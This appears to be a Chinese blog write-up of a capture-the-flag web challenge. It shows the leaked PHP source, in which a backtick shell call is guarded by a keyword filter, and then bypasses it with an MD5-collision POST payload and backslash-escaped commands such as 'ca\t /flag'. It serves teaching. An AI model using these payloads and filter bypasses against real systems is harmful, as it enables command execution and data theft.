[安洵杯 2019]easy_web1

于 2024-02-02 23:35:54 发布
阅读量563 收藏 5
点赞数 11
文章标签: web安全 安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/daimakunnanhu/article/details/136001731
版权

今天玩ctf遇见一个比较有意思的题。闲来无事分享分享。

启动靶机后来到这个页面

 

web大法第一步,右键源代码,发现了一堆base64编码。

点击后发现就是主页面左上角的图片的内容经过编码后的呈现。似乎没什么作用

然后又拿着后台扫描工具一顿乱扫什么也没发现。。。

然后注意到参数自带“&cmd=”,尝试输入命令ls

 

forbid!!!看来确实存在cmd参数,并且ls命令被过滤了。尝试dir命令

 似乎dir没被过滤,但是仍然没有显示,只要不触发关键字都是“md5 is funny”,所以猜测这里无法回显。

然后奇葩的来了,尝试其他方法找不到破绽。

“?img=TXpVek5UTTFNbVUzTURabE5qYz0&cmd=”,img的值像不像base64编码。。。

对"TXpVek5UTTFNbVUzTURabE5qYz0&cmd="进行base64解码"MzUzNTM1MmU3MDZ1Njc=>rg@",再次base64解码得到一串字符串,这是经过hex编码的。解码后就是 555.png。带着555.png去访问,发现仍然是主页面左上角的图片。

这里大概就可以理解了,可能存在一个文件包含,并将内容编码呈现出来。这里也没其他内容,直接读取index.php

index.php->hex编码->base64->base64->"TmprMlpUWTBOalUzT0RKbE56QTJPRGN3"

直接访问,右键源代码,将呈现出来的内容进行解码

<?php
error_reporting(E_ALL || ~ E_NOTICE);
header('content-type:text/html;charset=utf-8');
$cmd = $_GET['cmd'];
if (!isset($_GET['img']) || !isset($_GET['cmd'])) 
    header('Refresh:0;url=./index.php?img=TXpVek5UTTFNbVUzTURabE5qYz0&cmd=');
$file = hex2bin(base64_decode(base64_decode($_GET['img'])));

$file = preg_replace("/[^a-zA-Z0-9.]+/", "", $file);
if (preg_match("/flag/i", $file)) {
    echo '<img src ="./ctf3.jpeg">';
    die("xixi锝?no flag");
} else {
    $txt = base64_encode(file_get_contents($file));
    echo "<img src='data:image/gif;base64," . $txt . "'></img>";
    echo "<br>";
}
echo $cmd;
echo "<br>";
if (preg_match("/ls|bash|tac|nl|more|less|head|wget|tail|vi|cat|od|grep|sed|bzmore|bzless|pcre|paste|diff|file|echo|sh|\'|\"|\`|;|,|\*|\?|\\|\\\\|\n|\t|\r|\xA0|\{|\}|\(|\)|\&[^\d]|@|\||\\$|\[|\]|{|}|\(|\)|-|<|>/i", $cmd)) {
    echo("forbid ~");
    echo "<br>";
} else {
    if ((string)$_POST['a'] !== (string)$_POST['b'] && md5($_POST['a']) === md5($_POST['b'])) {
        echo `$cmd`;
    } else {
        echo ("md5 is funny ~");
    }
}

?>
<html>
<style>
  body{
   background:url(./bj.png)  no-repeat center center;
   background-size:cover;
   background-attachment:fixed;
   background-color:#CCCCCC;
}
</style>
<body>
</body>
</html>

img参数应该不太可能实现了。。。分析cmd参数吧

1.这里注意echo `$cmd`,它的意思是将$cmd作为命令执行并输出。所以这里可以执行命令

2.这里过滤了许多,重点在这"|\\|\\\\|",php中会经历两次解析,php解析与正则解析。第一次php转义为"|\|\\|",第二次正则转义,将中间的|转义为普通字符,结果为"||\|"。所以实际上匹配的是"|\"。它没有过滤"\"符号。

3.md5碰撞,因为这里有string。没有办法再用数组和科学计数法的方法,所以只能使用真实的碰撞。

a=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%00%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1U%5D%83%60%FB_%07%FE%A2&b=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%02%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1%D5%5D%83%60%FB_%07%FE%A2

分析完后进行抓包,构造payload

ok,md5成功绕过。dir命令执行成功。最后一步读取flag。

l\s /

 

已经看见flag了,只需要cat就行了

ca\t /flag

 

这题第一步真的难想到,那个cmd可以传参同时也是base64编码。妙啊 

不会编程的崽
关注
  • 11
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
BUU CTF[CISCN2019 总决赛 Day2 Web1]Easyweb 1
weixin_46245411的博客
06-16 733
文章目录前言一、源码审计二、开始冻手1.伪造Cookie2.上传文件3.getshell总结 前言 没赶上2019的CISCN比赛,只能在BUU看到前人大佬们的荣光~ 不是很清楚BUU附属的源码是不是与比赛题目所给的一样,如果一样的话,我看其他大佬的WP都有BOOL盲注的出现,但是我直接审计源码绕过了SQL注入了,所以很好奇是不是有什么差异~ 所以我仅说说我解BUU的过程 一、源码审计 个人审计用到的几个比较重要源码:upload.php、config.php、function.php、user.p..
web buuctf [安洵 2019]easy_web1
weixin_44214568的博客
03-23 995
考点:md5强类型绕过(字符串) 一定要注意分析题目,要提高敏感 源代码最上面是一大串的base64编码后的文字,应该是左上角图像的编码,(这时候就应该考虑到能不能对index.php进行回显) 1.看链接上面有两个参数,一个是img,一个是file img的值是TXpVek5UTTFNbVUzTURabE5qYz0, 进行base64解码MzUzNTM1MmU3MDZlNjc=; 再进行base64解码3535352e706e67; 16进制转字符串555.png. 同样,对i..
[SUCTF 2019]EasyWeb 1
m0_50967960的博客
08-13 334
网上wp已经很多了,那么分享一个超级非预期解 哈哈哈哈 先说说考察知识点 考察点 php正则绕过 文件上传木马绕过 bypass open_basedir 非预期 正则绕过 背景:https://www.cnblogs.com/cimuhuashuimu/p/11546422.html 异或绕过preg_match脚本如下: <?php $l = ""; $r = ""; $argv = str_split("_GET"); for($i=0;$i<count($argv);$i++)
[CISCN2019 总决赛 Day2 Web1]Easyweb 1
weixin_43940853的博客
03-17 1335
文件泄露 通过观察源代码(反正就是这几个php文件嘛,一个个试就行了) //image.php.bak <?php include "config.php"; $id=isset($_GET["id"])?$_GET["id"]:"1"; $path=isset($_GET["path"])?$_GET["path"]:""; $id=addslashes($id); $path=a...
web_easy_
09-30
This set of skin is modified according to the customer's skin
easy_web_view:在移动和Web上轻松浏览Web视图!
02-04
easy_web_view 在Flutter网站和移动设备上轻松浏览Web! 支持HTML内容或单个元素 支持降价来源 支持转换为Flutter小部件 支持远程下载URL Markdown-> HTML HTML-> Markdown 支持更改URL 可选文字 如果您提供...
pasecactf_2019_web_honey_shop
05-04
PASECA2019_Web_honey_shop 题目详情 PASECA CTF 2019 Web honey_shop Difficulty: Easy 考点 LFI Flask Cookie伪造 启动 docker-compose up -d open 题目说明 Flag位于app/flag.txt,Docker中位于/app/flag.txt。 ...
2.rar_1T16_dwt_easy _noiseb5p
07-14
matlab cod fore DWT very Easy
easy_sound.rar_easy _webcam rtsp
09-24
簡易的聲音設定及取得.可自行取得webcam相關聲音資料.再配合相關rtsp的lib傳送出去.相關設定方式. /dev/dsp webcam 的聲音來源 RATE 頻率 CHANNELS 聲道
[BUUCTF][SUCTF 2019]EasyWeb
cosmoslin的博客
10-31 527
[SUCTF 2019]EasyWeb <?php function get_the_flag(){ // webadmin will remove your upload file every 20 min!!!! $userdir = "upload/tmp_".md5($_SERVER['REMOTE_ADDR']); if(!file_exists($userdir)){ mkdir($userdir); } if(!empty($_FILE
SUCTF2019 EasyWeb
segogt的博客
11-27 1151
SUCTF2019 EasyWeb 考察了3层内容 1.绕过正则匹配限制 $hhh = @$_GET['_']; if (!$hhh){ highlight_file(__FILE__); } if(strlen($hhh)>18){ die('One inch long, one inch strong!'); } if ( preg_match('/[\x00- 0...
[安洵 2019]easy_web 1
shinygod的博客
03-13 2087
知识点: 目录 解密一下,要base64解密两次,再16进制转一下: base64 > base64 > hex 我们可以试着传一个index.php hex > base64 >base64 得到一串base64的代码,解密 <?php error_reporting(E_ALL || ~ E_NOTICE); header('content-type:text/html;charset=utf-8'); $cmd = $_GET['cmd']; if (!isset(
[安洵 2019]easy_web
weixin_45566993的博客
02-12 513
Python微信订餐小程序课程视频 https://edu.csdn.net/course/detail/36074 Python实战量化交易理财系统 https://edu.csdn.net/course/detail/35475 题目打开如下,?img=TXpVek5UTTFNbVUzTURabE5qYz0&cmd=,同时查看源代码 这里有个MD5 is funny,说明这个题目大概率跟MD5有关 然后我抓包了一下,消息头里面没有什么特殊的东西,于是我尝试从url入手 首先把那个进行
[安洵 2019]easy_web详解
最新发布
weixin_61995249的博客
10-03 612
靶场:https://www.nssctf.cn/problem/732。
[安洵 2019]easy_serialize_php 1
03-16
这是一道 PHP 序列化题目,需要我们对 PHP 的序列化机制有一定的了解。 题目给出了一个序列化后的字符串,我们需要将其反序列化成 PHP 对象,并修改其中的某个... 具体的操作步骤可以参考以下代码: ... class User { ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值